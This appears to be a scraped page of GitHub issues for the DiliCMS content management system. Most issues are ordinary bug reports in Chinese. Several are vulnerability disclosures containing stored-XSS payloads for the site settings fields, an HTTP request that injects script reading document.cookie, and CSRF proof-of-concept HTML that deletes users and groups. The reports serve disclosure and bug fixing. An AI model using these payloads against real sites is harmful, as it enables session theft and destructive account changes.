chekun / dilicms Goto Github PK
View Code? Open in Web Editor NEWDiligentCMS
Home Page: http://www.dilicms.com/
License: MIT License
DiligentCMS
Home Page: http://www.dilicms.com/
License: MIT License
+新增表时的4个字段默认值为0
*id修改为无符号
XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment
Software Link : https://github.com/chekun/DiliCMS/tree/v2.4.0
POC :
POST /DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dili_session=xxxxx
Connection: close
Upgrade-Insecure-Requests: 1
dilicms_csrf_token=6f4a225b12c2c472984c72af51fdf31b&attachment_url=aaa%22%3E%3Cbody+onload%3Dalert%28document.cookie%29%3E&attachment_dir=attachments&attachment_type=.jpg%3B.gif%3B*.png%3B*.doc%20%22+onmouseover%3Dprompt%28907460%29+bad%3D%22&attachment_maxupload=2097152
分类模型那里我建了一个5级分类的xx,然后内容管理那里添加东西,发现:"分类管理>XX>一级分类>二级分类>三级分类",最多只能显示到三级,第四级就变成第一级
而且发现可以无限极的添加子类下去
第三级以后数据库里面level这个字段就不对了
更改logo路径后更新缓存logo无变化,仍旧是logo.gif
Error Number: 1146
Table 'app_hainuo.dili_u_c_keywords' doesn't exist
SELECT * FROM (dili_u_c_keywords
)
Filename: /data1/www/htdocs/153/hainuo/4/models/dili/category_mdl.php
Line Number: 21
我创建分类模型时候出现这个问题。
我没有找到这个问题所在 所以在此提出来求解决。
最后结果是 已经创建成功但是却返回错误页面 试验环境sae
将编辑器由xheditor换成kindeditor
新建了一个分类模型cat,一个内容模型item,然后item中有一个字段用了下拉菜单(数据模型)(INT),选定cat|slug
修改分类管理中的内容以后,内容管理的的item下拉没有及时出现修改后的分类,需要手动更新下分类模型管理。
比如
$setting['cities'] = [
'nanjing' => [
'name' => '南京',
'districts' => ['玄武区', '鼓楼区']
]
];
那么获取"南京",只需要
echo setting('cities.nanjing.name');
1、Login the backstage
http://127.0.0.1/admin/index.php
2、Go to System setting->site setting
3、add the following payload to the second textbox,and submit。
payload:site_domain=http://www.dilicms.com/" onmouseover="alert(1)
And move your mouse on the second textbook ,then Stored-XSS triggered
1、Login the backstage
http://127.0.0.1/admin/index.php
2、Go to System setting->site setting
3、add the following payload to the first textbox,and submit。
payload:site_name=DiliCMS'"/></script><script>alert(1)</script>
And then Stored-XSS triggered
DiliCMS在nginx下不特殊配置的话,只会显示首页,跳转其他页面都会显示404,之后再nginx.conf中添加如下配置
server {
listen 80;
root /www/web/xxx/;
server_name xxx.com xxx.com;
index index.html index.php index.htm;
error_page 400 /errpage/400.html;
error_page 403 /errpage/403.html;
error_page 404 /errpage/404.html;
error_page 503 /errpage/503.html;
location ~ ^(/(application|system|services|shared|admin/backup|admin/config|admin/controllers|admin/core|amdin/errors|admin/hooks|admin/language))/ {
deny all;
}
location / {
if ($request_uri ~* index/?$)
{
rewrite ^/(.*)/index/?$ /$1 permanent;
}
if (!-d $request_filename)
{
rewrite ^/(.+)/$ /$1 permanent;
}
if (!-e $request_filename) {
rewrite ^/(.*)$ /index.php/$1 last;
break;
}
set $admin '';
if ($request_uri ~* ^/admin/) {
set $admin A;
}
if ($request_uri ~* ^/install/) {
set $admin B;
}
if (!-e $request_filename) {
set $admin "X${admin}";
}
if ($admin = XA) {
rewrite ^/admin/(.*)$ /admin/index.php?/$1 last;
break;
}
if ($admin = XB) {
rewrite ^/install/public/(.*)$ /install/public/index.php?/$1 last;
}
if ($admin = X) {
rewrite ^/(.*)$ /index.php?/$1 last;
break;
}
}
location ~ \.php($|/) {
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param SCRIPT_FILENAME /www/web/xxx$fastcgi_script_name;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fastcgi_params;
}
location ~ /\.ht {
deny all;
}
}
添加之后页面可以跳转,后台也一切正常,但是上传图片时出错,路径如下:
‘/admin/index.php/content’
应该是上面配置文件的原因,现在不知道怎么解决这个问题了,希望能够得到解答!
用的系统自带的swfloader 8M 以下的文件可以上传,8M以上的文件上传不了。我传的是MOV文件!
服务器配置没问题,找了半天没解决,求大大帮忙。
如果有需要,我可以发SSH和FTP给大大看。
-[x] 升级CI到CodeIgniter3.0-dev
-[x] 试用migration管理数据库
private function watch() 105行
in_array($plugin['name'], $this->app->acl->rights['plugins'])
感觉应该改成 in_array($key, $this->app->acl->rights['plugins'])
1、Login the backstage
http://127.0.0.1/DiliCMS-develop-3.x/admin/index.php
2、Go to System setting->site setting
3、add the following payload to the fourth textbox
1"<script>alert(123)</script>
4、Save and see the announcement we just posted
And then Stored-XSS triggered ...
Software Link : https://github.com/chekun/DiliCMS
After the administrator logged in,open the page
test.html delete user POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>
test2.html delete group POC:
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
DiliCMS V2.1 DEV安装有BUG,我是在这里(https://github.com/DiliCMS/DiliCMS)download的
有BUG的VIEW层文件是\install\views\install.php
第7行有错
应该是这样的
1、Login the backstage
http://127.0.0.1/admin/index.php
2、Go to System setting->site setting
3、add the following payload to the third textbox,and submit。
payload:site_logo=images/logo.gif" onmouseover="alert(1)
And move your mouse on the third textbook ,then Stored-XSS triggered
在wiki上完成新增模块编写的指导手册
https://github.com/DiliCMS/DiliCMS/wiki
1、the backstage address
http://127.0.0.1/DiliCMS-develop-3.x/admin/index.php
2、login and use BurpSuite to intercepte packets,and then we can see the User credentials are transmitted over an unencrypted channel
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.